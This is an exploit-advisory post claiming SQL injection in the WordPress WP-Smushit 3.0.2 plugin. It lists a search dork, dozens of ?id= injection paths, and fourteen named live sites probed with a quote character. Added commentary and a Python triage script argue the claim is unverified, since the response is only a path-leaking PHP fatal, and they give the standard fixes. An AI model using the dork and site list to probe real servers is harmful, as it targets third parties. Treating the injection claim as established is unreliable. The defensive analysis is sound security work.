- ####################################################################
- # Exploit Title : WordPress WP-Smushit Plugin 3.0.2 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 28/01/2019
- # Vendor Homepage : premium.wpmudev.org
- # Software Download Link : downloads.wordpress.org/plugin/wp-smushit.3.0.2.zip
- # Software Information Link : wordpress.org/plugins/wp-smushit/
- # Software Version : 3.0.2
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:"/wp-content/plugins/wp-smushit/"
- # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- ####################################################################
- # Description about Software :
- **********************************
- WordPress WP-Smushit - Smush Image Compression and Optimization Plugin =>
- Smush has been benchmarked and tested number one for speed and quality and
- is the award-winning, back-to-back proven crowd favorite image optimization plugin for WordPress.
- Resize, optimize, optimise and compress all of your images with the
- incredibly powerful and 100% free WordPress image smusher,
- brought to you by the superteam at WPMU DEV!
- ####################################################################
- # Impact :
- **********
- * The post claims that WordPress WP-Smushit Plugin 3.0.2 is prone to an SQL-injection
- vulnerability because it fails to sufficiently sanitize user-supplied data before using it
- in an SQL query.
- * If that were so, an attacker could read or modify data in the database, compromise the
- application, or exploit latent vulnerabilities in the underlying database; on a misconfigured
- web server, read and write access to the filesystem might follow.
- * The evidence presented, however, never shows an SQL query being reached: the listed paths are
- plugin include files (view templates and class files) that expect to be loaded by WordPress, and the
- only response shown is a PHP fatal error for an undefined WordPress function. No database error
- message, timing difference, or extracted data is given. Treat the SQL-injection claim as unverified;
- the observable issue is a direct-access PHP fatal that discloses the server's full filesystem path.
- ####################################################################
- # Claimed SQL Injection Entry Points :
- **********************
- /wp-content/plugins/wp-smushit/app/class-wp-smush-dashboard.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/class-wp-smush-nextgen.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk-settings/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk/meta-box-header.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/meta-box-footer.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/upsell-meta-box-header.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/directory/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/integrations/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/meta-box-header.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/summary-meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/pro-features/meta-box-header.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/pro-features/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/settings/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/meta-boxes/summary/meta-box.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/modals/directory-list.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/modals/quick-setup.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/smush-page.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/tabs.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/app/views/wp-smush-nextgen-bulk-page.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/external/free-dashboard/module.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-nextgen.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-gutenberg.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-s3.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/nextgen/class-wp-smush-nextgen-admin.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/nextgen/class-wp-smush-nextgen-stats.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/integrations/s3/class-wp-smush-s3-compat.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-ajax.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-async-editor.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-backup.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-cdn.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-png2jpg.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smush-resize.php?id=[SQL Injection]
- /wp-content/plugins/wp-smushit/core/modules/class-wp-smushit.php?id=[SQL Injection]
- ####################################################################
- # Example Sites Returning the Error Below (not verified as injectable) :
- *************************
- [+] brewurbancafe.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] wegdermee.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] ootb.net.au/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] chefleticia.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] bonofe.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] kinetix365.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] maquilalama.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] tobaccoroadtours.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] harpreetkumar.com/hindi/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] 10minutos.com.bo/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] akarcenter.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] otherside-e.com/wp/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] bowgrid.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- [+] sportschampic.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27
- ####################################################################
- # Example Error Returned (a PHP fatal, not a database error) :
- ****************************
- Fatal error: Uncaught Error: Call to undefined function esc_html__() in /home/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php:17
- Stack trace: #0 {main}
- thrown in /home/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php on line 17
- 
- What this error shows: esc_html__() is a WordPress core function, so the view file dies at line 17
- whenever it is executed outside WordPress, i.e. whenever it is requested directly by URL. The fatal is
- raised before any code could read the id parameter, and nothing in the output depends on the value of
- id, so ?id=1' proves nothing about SQL injection. The output does expose two weaker issues on that host:
- the file evidently has no defined( 'ABSPATH' ) guard (execution reached line 17 instead of exiting), and
- display_errors is enabled, which leaks the absolute web root (/home/brewurbancafe/public_html). The
- standard fixes are an if ( ! defined( 'ABSPATH' ) ) { exit; } guard at the top of every plugin PHP file,
- and display_errors = Off with log_errors = On in the production php.ini.
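- Added example (not from the original post or from the plugin's authors): a small triage helper that tells a direct-access PHP fatal apart from a database error, which is the check a practitioner would run before filing any of the paths above as SQL injection. It classifies a response body, extracts any leaked filesystem path, and compares the baseline request (no parameter) with the ?id=1' request: if both return the same undefined-function fatal, the script died before the parameter could be reached and the finding is not injection. Both sample bodies are constructed: the PHP fatal is the one quoted in this post, and the MySQL message is a hypothetical contrast case. The host example.com, the SQL_ERROR_PATTERNS signature list and the probe_pair/differential helpers are this example's own assumptions.

```python
import re
from urllib.parse import quote

# Constructed sample: the PHP fatal quoted in this post. esc_html__() is a WordPress
# core function, so it is undefined whenever the file runs outside WordPress.
PHP_FATAL_BODY = (
    "Fatal error: Uncaught Error: Call to undefined function esc_html__() in "
    "/home/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views"
    "/blocks/progress-bar.php:17 Stack trace: #0 {main} thrown in /home"
    "/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views"
    "/blocks/progress-bar.php on line 17"
)

# Constructed, hypothetical contrast case: what a MySQL syntax error surfacing through
# PHP looks like when an unescaped quote really does reach a query.
MYSQL_ERROR_BODY = (
    "Warning: mysqli_query(): You have an error in your SQL syntax; check the manual "
    "that corresponds to your MySQL server version for the right syntax to use near "
    "''' at line 1"
)

# Assumed, non-exhaustive signatures of database errors leaking into HTTP responses.
SQL_ERROR_PATTERNS = [
    r"You have an error in your SQL syntax",
    r"Warning: mysqli?_",
    r"Unclosed quotation mark after the character string",
    r"ORA-\d{5}",
    r"pg_query\(\): Query failed",
]
UNDEFINED_FUNC_RE = re.compile(r"Call to undefined function (\w+)\(\)")
# Absolute *.php paths leaked by PHP error output (covers the usual web-root prefixes).
LEAKED_PATH_RE = re.compile(r"(/(?:home|var|srv|usr|opt)/[^\s:]+\.php)")


def classify(body: str) -> dict:
    """Label a response body as a SQL error, a direct-access PHP fatal, or neither."""
    leaked = sorted(set(LEAKED_PATH_RE.findall(body)))
    for pattern in SQL_ERROR_PATTERNS:
        if re.search(pattern, body):
            return {"kind": "sql_error", "undefined_function": None, "leaked_paths": leaked}
    m = UNDEFINED_FUNC_RE.search(body)
    if m:
        return {"kind": "php_direct_access", "undefined_function": m.group(1), "leaked_paths": leaked}
    return {"kind": "none", "undefined_function": None, "leaked_paths": leaked}


def probe_pair(base_url: str, path: str, payload: str = "1'") -> tuple:
    """URLs for the differential test: the bare file, and the same file with the payload."""
    bare = base_url.rstrip("/") + path
    return bare, f"{bare}?id={quote(payload, safe='')}"


def differential(baseline_body: str, payload_body: str) -> str:
    """Compare the response without a parameter against the response with the injected quote."""
    base, pay = classify(baseline_body), classify(payload_body)
    if (base["kind"] == pay["kind"] == "php_direct_access"
            and base["undefined_function"] == pay["undefined_function"]):
        # Same fatal either way: the script died before any code could read `id`.
        return "not_injection"
    if pay["kind"] == "sql_error" and base["kind"] != "sql_error":
        # The database complained only once the quote was injected.
        return "sqli_candidate"
    return "inconclusive"


if __name__ == "__main__":
    bare, injected = probe_pair(
        "https://example.com",  # hypothetical target
        "/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php",
    )
    print("request both:", bare, "and", injected)
    print(classify(PHP_FATAL_BODY))
    print("same fatal with and without payload ->", differential(PHP_FATAL_BODY, PHP_FATAL_BODY))
    print("clean baseline, SQL error on payload ->", differential("<html>ok</html>", MYSQL_ERROR_BODY))
```

- Run it against the quoted fatal and the verdict is not_injection, with the leaked web-root path listed under leaked_paths; a genuine injection point would produce a clean baseline and a database error only on the payload request. In a real engagement fetch the two URLs from probe_pair and feed the bodies to differential; a time-based or blind check is still needed where errors are suppressed.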
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################